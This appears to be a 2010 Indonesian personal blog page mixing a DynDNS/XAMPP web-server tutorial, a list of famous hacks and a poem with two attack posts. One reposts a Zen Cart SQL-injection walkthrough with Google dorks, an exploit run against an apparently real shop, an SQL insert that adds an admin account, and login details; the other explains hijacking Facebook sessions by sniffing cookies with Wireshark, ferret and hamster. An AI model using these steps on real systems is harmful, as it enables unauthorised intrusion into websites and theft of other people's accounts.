Tutorial berikut ini bermanfaat bagi kita jika :

1. Ingin memanfaatkan IP Public yang Dinamis maupun Statis khususnya dari Telkom Speedy sehingga dapat digunakan untuk IP Webserver kita.

2. Ingin memanfaatkan IP Public untuk Domain Webserver kita dengan Free Domain.

3. Ingin memantau IP Public Dimanis yang kita dapatkan dari Telkom Speedy atau ISP lain sehingga kita dapat mengakses jaringan kita dari luar dengan mudah.

4. Ingin memanfaatkan IP Public Dimanis yang kita dapatkan dari Telkom Speedy atau ISP lain sehingga kita dapat memanfaatkan dan mengakses VPN dengan mudah melalui Fre Domain Name yang kita dapatkan dari DYNDNS. Artinya kita tidak perlu bersusah payah mencari Identitas IP Public yang kita miliki, cukup dengan mengakses Domain Name kita saja.

Oke dech kalo begitu, kita akan memulai Menu Masakan ini dengan mempersiapkan Resep-resepnya sebagai berikut :

1. Register di : http://www.dyndns.com

2. Download Dynamic DNS Updater di :

http://cdn.dyndns.com/windows/DynUpSetup.exe

atau

http://jamesbond.xcode.or.id/files/DDNS/DynDNS-Updater-4.1.5.exe

3. Siapkan Modem ADSL yang support Portforwarding. Anda bisa menambah wawasan tentang Port Forwarding baca artikel ini :

http://jamesbond.xcode.or.id/setting_port_forwarding_ip_adsl.html

4. Siapkan XAMPP Webserver lokal dan hasil websites desain anda ( apa aja boleh dech ).

http://jamesbond.xcode.or.id/panduan_membuat_webserver_dgn_xampp.html

~~~

Cara memasak :

1. Lakukan Registrasi di DynDNS seperti langkah-langkah dibawah ini :

2. Pilih menu “Host Service” lalu Klik “Add New Host”

3. Masukkan Nama Hostname yang kita inginkan, misalnya disini saya pakai hostname XPSOLUTION, lalu pilih DNS Name yang sesuai kehendak kita dan disini saya pakai BLOGDNS.COM. Maka Domain Name yang kita dapatkan nanti adalah : xpsolution.blogdns.com. Selanjutnya masukkan IP Public yang kita peroleh dari Telkom Speedy, bisa kita lihat dari Status Modem ADSL kita.

4. Selanjutnya kita pilih fitur atau service yang akan kita gunakan lalu Klik “Add New Chart”

5. Selanjutnya kita klik “Next”, disini kita lihat bahwa kita Free Charge serta mendapatkan FREE Domain Name hingga 5 nama Hostname.

6. Okey, Register Hostname di DynDNS telah selesai kita buat.

7. Install Dynamic DNS Updater dan running di salah satu PC yang ada dalam jaringan LAN anda, boleh juga pada PC dengan XAMPP Webserver anda. Yang penting punya akses internet karena aplikasi inilah yang akan memberitahukan kepada Account DynDNS kita tentang IP Public yang kita miliki.

http://cdn.dyndns.com/windows/DynUpSetup.exe

atau

http://jamesbond.xcode.or.id/files/DDNS/DynDNS-Updater-4.1.5.exe

8. Okey, sampai disini kita sudah dapat melakukan Updating IP Public ke DynDNS dan selanjutnya kita dapat fungsikan lebih lanjut. Artinya “Jika kita mengakses ke Hostname  xp.solution.blogdns.com maka secara otomatis DynDNS akan mengarahkan ke IP Public : 125.164.75.150.

Jika IP Public ini adalah Modem ADL Router maka jika xp.solution.blogdns.com dari akses ke Webbrowser maka akan muncul tampilan setting Modem ADSL Router.

Jika pada IP Public : 125.164.75.150 ini mengunakan DialUp Mikrotik PPPoE, maka hostname  xp.solution.blogdns.com dapat digunakan sebagai identifikasi untuk remote akses ke Mikrotik tsb pake Winbox maupun Webbox.

Jika pada IP Public : 125.164.75.150 ini adalah Portforwarding ke sebuah XAMPP Webserver, maka jika hostname  xp.solution.blogdns.com diakses dari Webbrowser maka akan muncul tampilan Webserver yang telah kita buat. Contohnya pada langkah berikut inilah cara membuat Webserver Portforwarding.

9. Install XAMPP pada PC kita dan tempatkan desain websites kita ke folder C:\xampp\htdocs . ( misalnya IP Local PC kita adalah 192.168.88.200 ).

10. Setelah itu kita pastikan Webserver kita berfungsi secara benar dengan mengakses Websites kita dari Webrowser ke IP  192.168.88.200, tampil seperti dibawah ini :.

11. Selanjutnya kita setting Portforwarding pada modem ADSL Router kita untuk PORT 80 di forward ke IP Address PC kita tadi yaitu 192.168.88.200.

12. Okey, semua setting telah selesai kita lakukan dan langkah terakhir adalah melihat hasilnya dengan mengakses Hostname xp.solution.blogdns.com di Webbrowser kita. Jika masih kurang yakin, kita bisa minta teman-teman yang lain ( boleh juga yang di luar area jaringan LAN kita untuk mengakses Hostname yang telah kita buat tadi )… Okey… sangat mudah sekali bukan…?

dikutip dari : http://artikel.xcode.or.id/2010/03/17/panduan-membuat-webserver-dgn-ip-public-dinamis-via-dyndns/

Tags Tags: , , ,
Categories: Computer
Posted By: L.T.K - S4VA
Last Edit: 20 Mar 2010 @ 02 20 AM

EmailPermalinkComments (0)

 20 Feb 2010 @ 7:40 AM 

iseng2 doang nemu.. dah basi sih.. niat ngeshare doang.. :p

this an old bug from BlackH >> http://milw0rm.com/exploits/9005
works for Zen Cart version 1.3.8 but its works on XOOPS Zen Cart module too
lets go.. :p

google dork is

“powered by xoops” inurl:”modules/zox”
“powered by xoops” “zen cart”

run the exploit from ur shell

root@evilc0de:/home/noge# ./zen.py -url http://www.a-akinai.com/modules/zox
sql@jah$

now try with show tables; command, if it success then we can exploit the target

sql@jah$ show tables;
>> success ( show tables; )

command execute successfully.. but u cant see the table list right?
lets add admin user to database with this sql command..

sql@jah$ INSERT INTO admin (admin_id, admin_name, admin_email, admin_pass) VALUES (55, ‘giant’, ‘admin@localhost’, ‘617ec22fbb8f201c366e9848c

0eb6925:87′);
>> success ( INSERT INTO admin (admin_id, admin_name, admin_email, admin_pass) VALUES (55, ‘giant’, ‘admin@localhost’, ‘617ec22fbb8f201c366e9848c0eb6925:87′); )

admin added successfully.. now try login to admin panel..

http://www.a-akinai.com/modules/zox/admin/login.php
username : giant
password : wew

taken from http://evilc0de.blogspot.com/2010/02/xoops-module-zen-cart.html

Tags Tags: , , , ,
Categories: Hacking
Posted By: L.T.K - S4VA
Last Edit: 20 Feb 2010 @ 07 40 AM

EmailPermalinkComments (0)

 20 Feb 2010 @ 7:38 AM 

Perkembangan komputer dan internet tidak hanya mengantarkan berbagai kemudahan dalam berbagai bidang, tapi juga mengundang berbagai tindak pembobolan sistem yang dilatarbelakangi oleh berbagai motivasi. Seperti disarikan dari Tech Tuesday, berikut adalah sembilan kegiatan hacking (penyusupan dan pembobolan sistem) terbesar yang pernah terjadi.

Captain Zap: adalah nama alias dari Ian Murphy. Pria ini merupakan orang pertama yang dihukum karena kegiatan hacking. Dia dan tiga orang temannya membobol sistem komputer AT&T dan mengacaukan sistem pewaktunya. Akibat ulahnya, sistem jadi dinyatakan sibuk pada saat tidak sibuk, dan sebaliknya. Dia ditahan pada tahun 1982 dan kisahnya difilmkan dalam “Sneakers”. Setelah itu, dirinya lalu mendirikan perusahaan konsultasi sekuriti, IAM/Security Data Systems.

Worm Internet, Morris: Pada bulan November 1988, Cornell, mahasiswa program Sarjana dari Robert Morris, menyebarkan apa yang kemudian disebut sebagai worm internet yang paling merusak sepanjang sejarah, berdasarkan jumlah komputer yang mati karenanya. Saat itu, lebih dari 10% dari layanan online lumpuh sehingga menyebaban kerugian sebesar US$15 juta. Worm Morris memacu pemerintah untuk mendirikan CERT (Computer Emergency Response Team). Morris adalah hacker pertama yang dikenai hukum cyber di Amerika Serikat, Computer Fraud and Abuse Act. Saat ini, dirinya menjadi pengajar Ilmu Komputer di MIT.

Kevin-1: karena ada dua pelaku hacking bernama depan Kevin, Kevin-1 adalah sebutan untuk Kevin Mitnick. Mitnick adalah hacker yang paling terkenal yang pernah ada. Kisahnya banyak disarikan ke dalam buku bahkan film (War Games terinspirasi oleh kegiatan hacking yang dilakukan pada komputer milik lembaga pertahanan udara, The Nort American Air Defense Command, yang mana Mitnick mengelak bahwa dirinya terlibat). Dirinya menghilang dari perburuan PBB selama dua setengah tahun dan akhirnya ditangkap pada tahun 1995. Dia bebas dari penjara pada tahun 2000 dan sekarang menjadi seorang konsultan keamanan komputer sekaligus penulis.

Kevin-2: Adalah julukan yang diberikan untuk Kevin Poulsen. Pria ini melakukan aksi pembobolan saluran telepon. Dirinya mengambil alih saluran telepon demi untuk memenangkan kontes di sebuah stasiun radio di Los Angeles pada tahun 1990. Juga untuk memenangkan hadiah Porsche 944. Setelah bebas dari penjara, Poulsen terjun ke dunia jurnalistik dan sekarang menjabat sebagai direktur editorial di SecurityFocus.com.

Virus Melissa: Ditulis oleh David Smith, nama virus tersebut merujuk pada nama seorang penari telanjang yang ingin dikencaninya. Menyebar pada April 1999 virus ini menjadi salah satu yang paling merusak pada masa itu. Melissa mengilhami cara penyebaran virus saat ini, seperti Slammer dan SoBig. Melissa, merupakan virus macro yang menyusup di ratusan komputer, sejumlah pakar memperkirakan ada sebanyak 20% dari komputer di internet lumpuh ketika itu.

Kasus Deface The New York Times: dapat dipastikan, kasus penggantian tampilan situs milik harian The New York Times dengan tulisan “Bebaskan Kevin Mitnick” yang terjadi pada September 1998, hanyalah bentuk lain dari kreatifitas grafis di Web. Namun, hal tersebut tetap menyolok dan dianggap menghebohkan. Sampai sekarang, para pelaku kejahatan yang melakukan aksi deface situs dengan gambar wanita telanjang, seperti yang banyak terjadi saat ini, tak pernah bisa ditangkap.

Mafiaboy: serangkaian serangan denial of service temporal yang terjadi pada Februari 2000, sempat menjadikan internet kacau. Situs-situs kenamaan seperti Amazon.com, Yahoo! dan eBay jadi sulit diakses. Seorang hacker kebangsaan Kanada dengan nama samaran Mafiaboy kemudian ditangkap segera setelah itu. Namun demikian, banyak yang menganggap bahwa hal tersebut hanyalah ujian bagi pemerintah Amerika Serikat untuk mengatasi kejahatan cyber.

Kasus Hacking Kriegsman Furs: Ini merupakan kasus sabotase situs milik sebuah perusahaan penghasil bahan pakaian dari bulu binatang, Kriegsman Furs. Situs tersebut digantikan dengan ungkapan reaksi dari gerakan kelompok penentang pemanfaatan bulu binatang untuk keperluan sandang, serta sebuah link ke situs yang peduli dengan hak-hak binatang. Ini bukanlah kegiatan hacking satu-satunya yang dimotifasi kepentingan politik. Kejadian seperti ini kemudian banyak dijumpai pada beberapa bulan ini, namun hal ini dapat diatasi.

Linux dan Perl: Kedua hal ini dinyatakan sebagai kegiatan hacking terbaik dari yang terjadi selama ini, berkaitan dengan dampak yang ditimbulkan. Linus Torvalds, bersama-sama melakukan hacking terhadap Linux dan membuatnya dapat bekerja pada platform Intel. Ini merupakan sebuah nilai tambah penting bagi perusahaan-perusahaan yang menginginkan performa Unix tanpa harus mengeluarkan biaya sebesar biaya pembangunan sebuah workstation. Larry Wall, mengembangkan dua program bernama ’sed’ dan ‘awk’ dan menyatukannya, PERL bahasa pemrograman yang banyak digunakan. Kegiatan hacking yang dilakukan Steve Wozniak, Apple I, juga mendapat predikat serupa.

Dikutip dari : fei_tonk (yogyafree.net)

Tags Tags: , , , , , , , ,
Categories: Hacking
Posted By: L.T.K - S4VA
Last Edit: 20 Feb 2010 @ 07 38 AM

EmailPermalinkComments (0)

 13 Feb 2010 @ 4:10 PM 

aku meleleh di antara bising,
deru-deru jalur yang basah setelah hujan kemarin pagi

belum hingga jalurnya sampai
lambai nantinya aku bertarung dengan andai

aku ingin bercerita tentang semua,

dengan tuts-tuts hati yang panjangnya mungkin melebihi angkasa
dengan dawai-dawai,
rupawan berbisik pada telinga manja

aku ingin katakan hasilnya…
bahwa aku hanya ingin sejumput saja pandangan dan senyummu…
namun rasanya aku tak akan pernah ada disitu

Tags Tags: , ,
Categories: Poetry
Posted By: L.T.K - S4VA
Last Edit: 13 Feb 2010 @ 04 10 PM

EmailPermalinkComments (0)

 06 Feb 2010 @ 6:29 AM 
 

 

Article ini saia copy dari article x-shadow di FB dengan judul yang sama…

sidejacking merupakan teknik ‘pembajakan session’ dari sebuah komunikasi TCP/IP.mirip sama session hijacking
attacker menggunakan paket sniffing misalnya wireshark memcapture semua komunikasi yang ada pada jaringan.setelah itu attacker mencari session atau cookie dari hasil caputer tadi.

teknik seperti ini bisa di gunakan sebagai alternatif..misalnya ketika melakukan sniffing tidak berhasil gara2 target yang di sniffing menerapkan proteksi diantaranya antiarp,antinetcut dll yang menyebabkan teknik arp poisonong tidak bisa di gunakan.

ok..let’s rock..

tools :
1.backtrack 4 final ( os lain juga bisa)
2.wireshark
3.hamster dan ferret ( uda ada dalam backtrack 4)

1.capture paket – paket yang ada pada jaringan dengan wireshark

2.setelah paket yang terkumpul uda banyak,simpan hasil capture tersebut,misalnya di direktory /pentest/sniffers/hamster dengan nama capture.pcap

3.buka terminal atau console.setelah itu jalankan ferret untuk membaca file hasil capture tadi ( capture.pcap )


setelah di baca dengan ferret,hasilnya berupa file hamster.txt

4. jalankan hamster..

5. keadaan sebelum sesi di bajak..

6.buka browser…setelah tu setting proxy browser menjadi http://127.0.0.1 port 1234
akses http://hamster

klik ip yang ingin di lihat sesinya…pada gambar diatas misalnya 192.168.1.20
pada bagian kiri terdapat cookie dari ip 192.168.1.1..
untuk membajak sessi dari ip tersebut,tinggal klik salah satu link yang ada..misalnya link www.facebook.com
Binggo…..!!!!!
tanpa memasukan username dan password kita sudah bisa masuk ke halaman facebook…

thx to : x-shadow

Tags Tags: , , , ,
Categories: Hacking
Posted By: L.T.K - S4VA
Last Edit: 06 Feb 2010 @ 06 29 AM

EmailPermalinkComments (0)




\/ More Options ...
Change Theme...
  • Users » 1
  • Posts/Pages » 34
  • Comments » 44
Change Theme...
  • VoidVoid « Default
  • LifeLife
  • EarthEarth
  • WindWind
  • WaterWater
  • FireFire
  • LightLight

About



    No Child Pages.

s4va YM



    No Child Pages.